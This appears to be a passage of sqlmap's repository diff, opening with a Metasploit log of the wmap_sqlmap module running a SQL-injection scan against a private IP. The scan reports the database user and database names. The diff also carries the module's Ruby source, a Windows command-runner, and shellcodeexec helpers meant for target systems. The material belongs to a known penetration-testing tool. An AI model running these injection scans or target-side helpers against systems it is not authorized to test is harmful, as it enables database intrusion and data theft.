 msf auxiliary(wmap_sqlmap) > set RHOSTS 192.168.1.121
 RHOSTS => 192.168.1.121
 msf auxiliary(wmap_sqlmap) > set PATH /sqlmap/mysql/get_int.php
 PATH => /sqlmap/mysql/get_int.php
 msf auxiliary(wmap_sqlmap) > set QUERY id=1
 QUERY => id=1
 msf auxiliary(wmap_sqlmap) > set OPTS '--dbs --current-user'
 OPTS => --dbs --current-user
 msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py
 msf auxiliary(wmap_sqlmap) > show options 
 Module options:
   Name         Current Setting                                                 Required  Description                                          
   ----         ---------------                                                 --------  -----------                                          
   BATCH        true                                                            yes       Never ask for user input, use the default behaviour  
   BODY                                                                         no        The data string to be sent through POST              
   METHOD       GET                                                             yes       HTTP Method                                          
   OPTS         --dbs --current-user                                            no        The sqlmap options to use                            
   PATH         /sqlmap/mysql/get_int.php                                       yes       The path/file to test for SQL injection              
   Proxies                                                                      no        Use a proxy chain                                    
   QUERY        id=1                                                            no        HTTP GET query                                       
   RHOSTS       192.168.1.121                                                   yes       The target address range or CIDR identifier          
   RPORT        80                                                              yes       The target port                                      
   SQLMAP_PATH  /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py             yes       The sqlmap >= 0.6.1 full path                        
   SSL          false                                                           no        Use SSL                                              
   THREADS      1                                                               yes       The number of concurrent threads                     
   VHOST                                                                        no        HTTP server virtual host                             
 msf auxiliary(wmap_sqlmap) > run
 [*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121:80//sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
 SQLMAP: 
 SQLMAP: sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
 SQLMAP: and Daniele Bellucci <daniele.bellucci@gmail.com>
 SQLMAP: 
 SQLMAP: [*] starting at: 16:23:19
 SQLMAP: 
 SQLMAP: [16:23:20] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
 SQLMAP: back-end DBMS:  MySQL >= 5.0.0
 SQLMAP: 
 SQLMAP: current user:    'testuser@localhost'
 SQLMAP: 
 SQLMAP: available databases [3]:
 SQLMAP: [*] information_schema
 SQLMAP: [*] mysql
 SQLMAP: [*] test
 SQLMAP: 
 SQLMAP: 
 SQLMAP: [*] shutting down at: 16:23:21
 SQLMAP: 
 [*] Auxiliary module execution completed
 msf auxiliary(wmap_sqlmap) > 
--- a/extra/msfauxmod/wmap_sqlmap.rb
+++ b/extra/msfauxmod/wmap_sqlmap.rb
@@ -1,95 +0,0 @@
 require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Auxiliary::WMAPScanUniqueQuery
 	include Msf::Auxiliary::Scanner
 	def initialize(info = {})
 		super(update_info(info,	
 			'Name'			=> 'SQLMAP SQL Injection External Module',
 			'Description'	=> %q{
 				This module launch a sqlmap session.
 				sqlmap is an automatic SQL injection tool developed in Python.
 				Its goal is to detect and take advantage of SQL injection
 				vulnerabilities on web applications. Once it detects one
 				or more SQL injections on the target host, the user can
 				choose among a variety of options to perform an extensive
 				back-end database management system fingerprint, retrieve
 				DBMS session user and database, enumerate users, password
 				hashes, privileges, databases, dump entire or user
 				specific DBMS tables/columns, run his own SQL SELECT
 				statement, read specific files on the file system and much
 				more.
 			},
 			'Author'		=> [ 'bernardo.damele [at] gmail.com', 'daniele.bellucci [at] gmail.com' ],
 			'License'		=> BSD_LICENSE,
 			'Version'		=> '$Revision$',
 			'References'	=>
 				[
 					['URL', 'http://sqlmap.sourceforge.net'],
 				]
 			))
 		register_options(
 			[
 				OptString.new('METHOD', [ true,  "HTTP Method", 'GET' ]),
 				OptString.new('PATH', [ true,  "The path/file to test for SQL injection", 'index.php' ]),
 				OptString.new('QUERY', [ false, "HTTP GET query", 'id=1' ]),
 				OptString.new('BODY', [ false, "The data string to be sent through POST", '' ]),
 				OptString.new('OPTS', [ false,  "The sqlmap options to use", ' ' ]),
 				OptPath.new('SQLMAP_PATH', [ true,  "The sqlmap >= 0.6.1 full path ", '/sqlmap/sqlmap.py' ]), 
 				OptBool.new('BATCH', [ true,  "Never ask for user input, use the default behaviour", true ])
 			], self.class)
 	end
 	# Modify to true if you have sqlmap installed.
 	def wmap_enabled
 		false
 	end
 	# Test a single host
 	def run_host(ip)
 		sqlmap = datastore['SQLMAP_PATH'] 
 		if not sqlmap
 			print_error("The sqlmap script could not be found")
 			return
 		end
 		data = datastore['BODY']
 		method = datastore['METHOD'].upcase
 		sqlmap_url  = (datastore['SSL'] ? "https" : "http")
 		sqlmap_url += "://" + self.target_host + ":" + datastore['RPORT']
 		sqlmap_url += "/" + datastore['PATH'] 
 		if method == "GET"
 			sqlmap_url += '?' + datastore['QUERY']
 		end
 		cmd  = sqlmap + ' -u \'' + sqlmap_url + '\''
 		cmd += ' --method ' + method
 		cmd += ' ' + datastore['OPTS']
 		if not data.empty?
 			cmd += ' --data \'' + data + '\''
 		end
 		if datastore['BATCH'] == true
 			cmd += ' --batch'
 		end
 		print_status("exec: #{cmd}")
 		IO.popen( cmd ) do |io|
 			io.each_line do |line|
 				print_line("SQLMAP: " + line.strip)
 			end
 		end
 	end
 end
--- a/extra/mssqlsig/update.py
+++ b/extra/mssqlsig/update.py
@@ -0,0 +1,137 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 import codecs
 import os
 import re
 import urllib2
 import urlparse
 from xml.dom.minidom import Document
 # Path to the XML file with signatures
 MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml")
 # Url to update Microsoft SQL Server XML versions file from
 MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
 def updateMSSQLXML():
    if not os.path.exists(MSSQL_XML):
        errMsg = "[ERROR] file '%s' does not exist. Please run the script from its parent directory" % MSSQL_XML
        print errMsg
        return
    infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL
    print infoMsg
    try:
        req = urllib2.Request(MSSQL_VERSIONS_URL)
        f = urllib2.urlopen(req)
        mssqlVersionsHtmlString = f.read()
        f.close()
    except urllib2.URLError:
        __mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL)
        __mssqlHostname = __mssqlPath[1]
        warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname
        warnMsg += " check your Internet connection and retry"
        print warnMsg
        return
    releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I | re.M)
    releasesCount = len(releases)
    # Create the minidom document
    doc = Document()
    # Create the <root> base element
    root = doc.createElement("root")
    doc.appendChild(root)
    for index in xrange(0, releasesCount):
        release = releases[index]
        # Skip Microsoft SQL Server 6.5 because the HTML
        # table is in another format
        if release == "6.5":
            continue
        # Create the <signatures> base element
        signatures = doc.createElement("signatures")
        signatures.setAttribute("release", release)
        root.appendChild(signatures)
        startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index])
        if index == releasesCount - 1:
            stopIdx = len(mssqlVersionsHtmlString)
        else:
            stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1])
        mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx]
        servicepackVersion = re.findall("</td><td>[7\.0|2000|2005|2008|2008 R2]*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I | re.M)
        for servicePack, version in servicepackVersion:
            if servicePack.startswith(" "):
                servicePack = servicePack[1:]
            if "/" in servicePack:
                servicePack = servicePack[:servicePack.index("/")]
            if "(" in servicePack:
                servicePack = servicePack[:servicePack.index("(")]
            if "-" in servicePack:
                servicePack = servicePack[:servicePack.index("-")]
            if "*" in servicePack:
                servicePack = servicePack[:servicePack.index("*")]
            if servicePack.startswith("+"):
                servicePack = "0%s" % servicePack
            servicePack = servicePack.replace("\t", " ")
            servicePack = servicePack.replace("No SP", "0")
            servicePack = servicePack.replace("RTM", "0")
            servicePack = servicePack.replace("TM", "0")
            servicePack = servicePack.replace("SP", "")
            servicePack = servicePack.replace("Service Pack", "")
            servicePack = servicePack.replace("<a href=\"http:", "")
            servicePack = servicePack.replace("  ", " ")
            servicePack = servicePack.replace("+ ", "+")
            servicePack = servicePack.replace(" +", "+")
            if servicePack.endswith(" "):
                servicePack = servicePack[:-1]
            if servicePack and version:
                # Create the main <card> element
                signature = doc.createElement("signature")
                signatures.appendChild(signature)
                # Create a <version> element
                versionElement = doc.createElement("version")
                signature.appendChild(versionElement)
                # Give the <version> elemenet some text
                versionText = doc.createTextNode(version)
                versionElement.appendChild(versionText)
                # Create a <servicepack> element
                servicepackElement = doc.createElement("servicepack")
                signature.appendChild(servicepackElement)
                # Give the <servicepack> elemenet some text
                servicepackText = doc.createTextNode(servicePack)
                servicepackElement.appendChild(servicepackText)
    # Save our newly created XML to the signatures file
    mssqlXml = codecs.open(MSSQL_XML, "w", "utf8")
    doc.writexml(writer=mssqlXml, addindent="    ", newl="\n")
    mssqlXml.close()
    infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML
    print infoMsg
 if __name__ == "__main__":
    updateMSSQLXML()
--- a/extra/runcmd/README.txt
+++ b/extra/runcmd/README.txt
@@ -0,0 +1,3 @@
 Files in this folder can be used to compile auxiliary program that can
 be used for running command prompt commands skipping standard "cmd /c" way. 
 They are licensed under the terms of the GNU Lesser General Public License.
--- a/extra/runcmd/windows/README.txt
+++ b/extra/runcmd/windows/README.txt
@@ -0,0 +1,4 @@
 Compile only the Release version because the Runtime library option
 (Project Properties -> Configuration Properties -> C/C++ -> Code
 Generation) is set to "Multi-threaded (/MT)", which statically links
 everything into executable and doesn't compile Debug version at all.
--- a/extra/runcmd/windows/runcmd.sln
+++ b/extra/runcmd/windows/runcmd.sln
@@ -0,0 +1,20 @@
 Microsoft Visual Studio Solution File, Format Version 9.00
 # Visual Studio 2005
 Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
 EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Debug|Win32 = Debug|Win32
 		Release|Win32 = Release|Win32
 	EndGlobalSection
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
 		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32
 		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32
 		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32
 		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE
 	EndGlobalSection
 EndGlobal
--- a/extra/runcmd/windows/runcmd/runcmd.cpp
+++ b/extra/runcmd/windows/runcmd/runcmd.cpp
@@ -0,0 +1,46 @@
 /* 
 	runcmd - a program for running command prompt commands
 	Copyright (C) 2010 Miroslav Stampar
 	email: miroslav.stampar@gmail.com
 	This library is free software; you can redistribute it and/or
 	modify it under the terms of the GNU Lesser General Public
 	License as published by the Free Software Foundation; either
 	version 2.1 of the License, or (at your option) any later version.
 	This library is distributed in the hope that it will be useful,
 	but WITHOUT ANY WARRANTY; without even the implied warranty of
 	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 	Lesser General Public License for more details.
 	You should have received a copy of the GNU Lesser General Public
 	License along with this library; if not, write to the Free Software
 	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 */
 #include <stdio.h>
 #include <windows.h>
 #include <use_ansi.h>
 #include "stdafx.h"
 #include <string>
 using namespace std;
 int main(int argc, char* argv[])
 {
  FILE *fp;
  string cmd;
  for( int count = 1; count < argc; count++ )
 	cmd += " " + string(argv[count]);
  fp = _popen(cmd.c_str(), "r");
  if (fp != NULL) {
    char buffer[BUFSIZ];
    while (fgets(buffer, sizeof buffer, fp) != NULL)
      fputs(buffer, stdout);
  }
  return 0;
 }
--- a/extra/runcmd/windows/runcmd/runcmd.vcproj
+++ b/extra/runcmd/windows/runcmd/runcmd.vcproj
@@ -0,0 +1,225 @@
 <?xml version="1.0" encoding="windows-1250"?>
 <VisualStudioProject
 	ProjectType="Visual C++"
 	Version="8,00"
 	Name="runcmd"
 	ProjectGUID="{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
 	RootNamespace="runcmd"
 	Keyword="Win32Proj"
 	>
 	<Platforms>
 		<Platform
 			Name="Win32"
 		/>
 	</Platforms>
 	<ToolFiles>
 	</ToolFiles>
 	<Configurations>
 		<Configuration
 			Name="Debug|Win32"
 			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
 			IntermediateDirectory="$(ConfigurationName)"
 			ConfigurationType="1"
 			CharacterSet="1"
 			>
 			<Tool
 				Name="VCPreBuildEventTool"
 			/>
 			<Tool
 				Name="VCCustomBuildTool"
 			/>
 			<Tool
 				Name="VCXMLDataGeneratorTool"
 			/>
 			<Tool
 				Name="VCWebServiceProxyGeneratorTool"
 			/>
 			<Tool
 				Name="VCMIDLTool"
 			/>
 			<Tool
 				Name="VCCLCompilerTool"
 				Optimization="0"
 				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
 				MinimalRebuild="true"
 				BasicRuntimeChecks="3"
 				RuntimeLibrary="0"
 				UsePrecompiledHeader="2"
 				WarningLevel="3"
 				Detect64BitPortabilityProblems="true"
 				DebugInformationFormat="4"
 			/>
 			<Tool
 				Name="VCManagedResourceCompilerTool"
 			/>
 			<Tool
 				Name="VCResourceCompilerTool"
 			/>
 			<Tool
 				Name="VCPreLinkEventTool"
 			/>
 			<Tool
 				Name="VCLinkerTool"
 				LinkIncremental="2"
 				GenerateDebugInformation="true"
 				SubSystem="1"
 				TargetMachine="1"
 			/>
 			<Tool
 				Name="VCALinkTool"
 			/>
 			<Tool
 				Name="VCManifestTool"
 			/>
 			<Tool
 				Name="VCXDCMakeTool"
 			/>
 			<Tool
 				Name="VCBscMakeTool"
 			/>
 			<Tool
 				Name="VCFxCopTool"
 			/>
 			<Tool
 				Name="VCAppVerifierTool"
 			/>
 			<Tool
 				Name="VCWebDeploymentTool"
 			/>
 			<Tool
 				Name="VCPostBuildEventTool"
 			/>
 		</Configuration>
 		<Configuration
 			Name="Release|Win32"
 			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
 			IntermediateDirectory="$(ConfigurationName)"
 			ConfigurationType="1"
 			CharacterSet="1"
 			WholeProgramOptimization="1"
 			>
 			<Tool
 				Name="VCPreBuildEventTool"
 			/>
 			<Tool
 				Name="VCCustomBuildTool"
 			/>
 			<Tool
 				Name="VCXMLDataGeneratorTool"
 			/>
 			<Tool
 				Name="VCWebServiceProxyGeneratorTool"
 			/>
 			<Tool
 				Name="VCMIDLTool"
 			/>
 			<Tool
 				Name="VCCLCompilerTool"
 				PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
 				RuntimeLibrary="0"
 				UsePrecompiledHeader="2"
 				WarningLevel="3"
 				Detect64BitPortabilityProblems="true"
 				DebugInformationFormat="3"
 			/>
 			<Tool
 				Name="VCManagedResourceCompilerTool"
 			/>
 			<Tool
 				Name="VCResourceCompilerTool"
 			/>
 			<Tool
 				Name="VCPreLinkEventTool"
 			/>
 			<Tool
 				Name="VCLinkerTool"
 				LinkIncremental="1"
 				GenerateDebugInformation="true"
 				SubSystem="1"
 				OptimizeReferences="2"
 				EnableCOMDATFolding="2"
 				TargetMachine="1"
 			/>
 			<Tool
 				Name="VCALinkTool"
 			/>
 			<Tool
 				Name="VCManifestTool"
 			/>
 			<Tool
 				Name="VCXDCMakeTool"
 			/>
 			<Tool
 				Name="VCBscMakeTool"
 			/>
 			<Tool
 				Name="VCFxCopTool"
 			/>
 			<Tool
 				Name="VCAppVerifierTool"
 			/>
 			<Tool
 				Name="VCWebDeploymentTool"
 			/>
 			<Tool
 				Name="VCPostBuildEventTool"
 			/>
 		</Configuration>
 	</Configurations>
 	<References>
 	</References>
 	<Files>
 		<Filter
 			Name="Source Files"
 			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
 			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
 			>
 			<File
 				RelativePath=".\runcmd.cpp"
 				>
 			</File>
 			<File
 				RelativePath=".\stdafx.cpp"
 				>
 				<FileConfiguration
 					Name="Debug|Win32"
 					>
 					<Tool
 						Name="VCCLCompilerTool"
 						UsePrecompiledHeader="1"
 					/>
 				</FileConfiguration>
 				<FileConfiguration
 					Name="Release|Win32"
 					>
 					<Tool
 						Name="VCCLCompilerTool"
 						UsePrecompiledHeader="1"
 					/>
 				</FileConfiguration>
 			</File>
 		</Filter>
 		<Filter
 			Name="Header Files"
 			Filter="h;hpp;hxx;hm;inl;inc;xsd"
 			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
 			>
 			<File
 				RelativePath=".\stdafx.h"
 				>
 			</File>
 		</Filter>
 		<Filter
 			Name="Resource Files"
 			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
 			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
 			>
 		</Filter>
 		<File
 			RelativePath=".\ReadMe.txt"
 			>
 		</File>
 	</Files>
 	<Globals>
 	</Globals>
 </VisualStudioProject>
--- a/extra/runcmd/windows/runcmd/stdafx.cpp
+++ b/extra/runcmd/windows/runcmd/stdafx.cpp
@@ -0,0 +1,8 @@
 // stdafx.cpp : source file that includes just the standard includes
 // runcmd.pch will be the pre-compiled header
 // stdafx.obj will contain the pre-compiled type information
 #include "stdafx.h"
 // TODO: reference any additional headers you need in STDAFX.H
 // and not in this file
--- a/extra/runcmd/windows/runcmd/stdafx.h
+++ b/extra/runcmd/windows/runcmd/stdafx.h
@@ -0,0 +1,17 @@
 // stdafx.h : include file for standard system include files,
 // or project specific include files that are used frequently, but
 // are changed infrequently
 //
 #pragma once
 #ifndef _WIN32_WINNT		// Allow use of features specific to Windows XP or later.                   
 #define _WIN32_WINNT 0x0501	// Change this to the appropriate value to target other versions of Windows.
 #endif						
 #include <stdio.h>
 #include <tchar.h>
 // TODO: reference additional headers your program requires here
--- a/extra/safe2bin/README.txt
+++ b/extra/safe2bin/README.txt
@@ -0,0 +1,17 @@
 To use safe2bin.py you need to pass it the original file,
 and optionally the output file name.
 Example:
 $ python ./safe2bin.py -i output.txt -o output.txt.bin
 This will create an binary decoded file output.txt.bin. For example, 
 if the content of output.txt is: "\ttest\t\x32\x33\x34\nnewline" it will 
 be decoded to: "	test	234
 newline"
 If you skip the output file name, general rule is that the binary
 file names are suffixed with the string '.bin'. So, that means that 
 the upper example can also be written in the following form:
 $ python ./safe2bin.py -i output.txt
--- a/extra/safe2bin/init.py
+++ b/extra/safe2bin/init.py
@@ -0,0 +1,8 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 pass
--- a/extra/safe2bin/safe2bin.py
+++ b/extra/safe2bin/safe2bin.py
@@ -0,0 +1,130 @@
 #!/usr/bin/env python
 """
 safe2bin.py - Simple safe(hex) to binary format converter
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 import binascii
 import re
 import string
 import os
 import sys
 from optparse import OptionError
 from optparse import OptionParser
 # Regex used for recognition of hex encoded characters
 HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})"
 # Raw chars that will be safe encoded to their slash (\) representations (e.g. newline to \n)
 SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c"
 # Characters that don't need to be safe encoded
 SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', '')))
 # Prefix used for hex encoded values
 HEX_ENCODED_PREFIX = r"\x"
 # Strings used for temporary marking of hex encoded prefixes (to prevent double encoding)
 HEX_ENCODED_PREFIX_MARKER = "__HEX_ENCODED_PREFIX__"
 # String used for temporary marking of slash characters
 SLASH_MARKER = "__SLASH__"
 def safecharencode(value):
    """
    Returns safe representation of a given basestring value
    >>> safecharencode(u'test123')
    u'test123'
    >>> safecharencode(u'test\x01\x02\xff')
    u'test\\01\\02\\03\\ff'
    """
    retVal = value
    if isinstance(value, basestring):
        if any(_ not in SAFE_CHARS for _ in value):
            retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER)
            retVal = retVal.replace('\\', SLASH_MARKER)
            for char in SAFE_ENCODE_SLASH_REPLACEMENTS:
                retVal = retVal.replace(char, repr(char).strip('\''))
            retVal = reduce(lambda x, y: x + (y if (y in string.printable or isinstance(value, unicode) and ord(y) >= 160) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)())
            retVal = retVal.replace(SLASH_MARKER, "\\\\")
            retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX)
    elif isinstance(value, list):
        for i in xrange(len(value)):
            retVal[i] = safecharencode(value[i])
    return retVal
 def safechardecode(value, binary=False):
    """
    Reverse function to safecharencode
    """
    retVal = value
    if isinstance(value, basestring):
        retVal = retVal.replace('\\\\', SLASH_MARKER)
        while True:
            match = re.search(HEX_ENCODED_CHAR_REGEX, retVal)
            if match:
                retVal = retVal.replace(match.group("result"), (unichr if isinstance(value, unicode) else chr)(ord(binascii.unhexlify(match.group("result").lstrip("\\x")))))
            else:
                break
        for char in SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]:
            retVal = retVal.replace(repr(char).strip('\''), char)
        retVal = retVal.replace(SLASH_MARKER, '\\')
        if binary:
            if isinstance(retVal, unicode):
                retVal = retVal.encode("utf8")
    elif isinstance(value, (list, tuple)):
        for i in xrange(len(value)):
            retVal[i] = safechardecode(value[i])
    return retVal
 def main():
    usage = '%s -i <input file> [-o <output file>]' % sys.argv[0]
    parser = OptionParser(usage=usage, version='0.1')
    try:
        parser.add_option('-i', dest='inputFile', help='Input file')
        parser.add_option('-o', dest='outputFile', help='Output file')
        (args, _) = parser.parse_args()
        if not args.inputFile:
            parser.error('Missing the input file, -h for help')
    except (OptionError, TypeError), e:
        parser.error(e)
    if not os.path.isfile(args.inputFile):
        print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
        sys.exit(1)
    f = open(args.inputFile, 'r')
    data = f.read()
    f.close()
    if not args.outputFile:
        args.outputFile = args.inputFile + '.bin'
    f = open(args.outputFile, 'wb')
    f.write(safechardecode(data))
    f.close()
 if __name__ == '__main__':
    main()
--- a/extra/shellcodeexec/README.txt
+++ b/extra/shellcodeexec/README.txt
@@ -0,0 +1,4 @@
 Binary files in this folder are data files used by sqlmap on the target
 system, but not executed on the system running sqlmap. They are licensed
 under the terms of the GNU Lesser General Public License and their source
 code is available on https://github.com/inquisb/shellcodeexec.
--- a/extra/shellcodeexec/linux/shellcodeexec.x32_
+++ b/extra/shellcodeexec/linux/shellcodeexec.x32_
--- a/extra/shellcodeexec/linux/shellcodeexec.x64_
+++ b/extra/shellcodeexec/linux/shellcodeexec.x64_
--- a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_
+++ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_
--- a/extra/shutils/blanks.sh
+++ b/extra/shutils/blanks.sh
@@ -0,0 +1,7 @@
 #!/bin/bash
 # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 # Removes trailing spaces from blank lines inside project files
 find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \;
--- a/extra/shutils/duplicates.py
+++ b/extra/shutils/duplicates.py
@@ -0,0 +1,27 @@
 #!/usr/bin/env python
 # Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 # Removes duplicate entries in wordlist like files
 import sys
 if len(sys.argv) > 0:
    items = list()
    with open(sys.argv[1], 'r') as f:
        for item in f.readlines():
            item = item.strip()
            try:
                str.encode(item)
                if item in items:
                    if item:
                        print item
                else:
                    items.append(item)
            except:
                pass
    with open(sys.argv[1], 'w+') as f:
        f.writelines("\n".join(items))
--- a/extra/shutils/pep8.sh
+++ b/extra/shutils/pep8.sh
@@ -0,0 +1,7 @@
 #!/bin/bash
 # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 # Runs pep8 on all python files (prerequisite: apt-get install pep8)
 find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \;
--- a/extra/shutils/postcommit-hook
+++ b/extra/shutils/postcommit-hook
@@ -0,0 +1,21 @@
 #!/bin/bash
 SETTINGS="../../lib/core/settings.py"
 declare -x SCRIPTPATH="${0}"
 FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
 if [ -f $FULLPATH ]
 then
    LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"');
    declare -a LINE;
    NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE")
    if [ -n "$NEW_TAG" ]
    then
        git commit -am "Automatic monthly tagging"
        echo "Creating new tag ${NEW_TAG}";
        git tag $NEW_TAG;
        git push origin $NEW_TAG
    fi
 fi;
--- a/extra/shutils/precommit-hook
+++ b/extra/shutils/precommit-hook
@@ -0,0 +1,22 @@
 #!/bin/bash
 SETTINGS="../../lib/core/settings.py"
 declare -x SCRIPTPATH="${0}"
 FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
 if [ -f $FULLPATH ]
 then
    LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"');
    declare -a LINE;
    INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
    if [ -n "$INCREMENTED" ]
    then
        sed "s/${LINE}/${INCREMENTED}/" $FULLPATH > $FULLPATH.tmp && mv $FULLPATH.tmp $FULLPATH
        echo "Updated ${INCREMENTED} in ${FULLPATH}";
    else
        echo "Something went wrong in VERSION increment"
        exit 1
    fi
 fi;
--- a/extra/shutils/pyflakes.sh
+++ b/extra/shutils/pyflakes.sh
@@ -0,0 +1,7 @@
 #!/bin/bash
 # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
 find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \;
--- a/extra/shutils/pylint.py
+++ b/extra/shutils/pylint.py
@@ -0,0 +1,50 @@
 #! /usr/bin/env python
 # Runs pylint on all python scripts found in a directory tree
 # Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html
 import os
 import re
 import sys
 total = 0.0
 count = 0
 __RATING__ = False
 def check(module):
    global total, count
    if module[-3:] == ".py":
        print "CHECKING ", module
        pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r')
        for line in pout:
            if  re.match("E....:.", line):
                print line
            if __RATING__ and "Your code has been rated at" in line:
                print line
                score = re.findall("\d.\d\d", line)[0]
                total += float(score)
                count += 1
 if __name__ == "__main__":
    try:
        print sys.argv
        BASE_DIRECTORY = sys.argv[1]
    except IndexError:
        print "no directory specified, defaulting to current working directory"
        BASE_DIRECTORY = os.getcwd()
    print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY
    for root, dirs, files in os.walk(BASE_DIRECTORY):
        if any(_ in root for _ in ("extra", "thirdparty")):
            continue
        for name in files:
            filepath = os.path.join(root, name)
            check(filepath)
    if __RATING__:
        print "==" * 50
        print "%d modules found" % count
        print "AVERAGE SCORE = %.02f" % (total / count)
--- a/extra/shutils/regressiontest.py
+++ b/extra/shutils/regressiontest.py
@@ -0,0 +1,165 @@
 #!/usr/bin/env python
 # Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 # See the file 'doc/COPYING' for copying permission
 import codecs
 import inspect
 import os
 import re
 import smtplib
 import subprocess
 import sys
 import time
 import traceback
 from email.mime.multipart import MIMEMultipart
 from email.mime.text import MIMEText
 sys.path.append(os.path.normpath("%s/../../" % os.path.dirname(inspect.getfile(inspect.currentframe()))))
 from lib.core.revision import getRevisionNumber
 START_TIME = time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime())
 SQLMAP_HOME = "/opt/sqlmap"
 REVISION = getRevisionNumber()
 SMTP_SERVER = "127.0.0.1"
 SMTP_PORT = 25
 SMTP_TIMEOUT = 30
 FROM = "regressiontest@sqlmap.org"
 #TO = "dev@sqlmap.org"
 TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
 SUBJECT = "regression test started on %s using revision %s" % (START_TIME, REVISION)
 TARGET = "debian"
 def prepare_email(content):
    global FROM
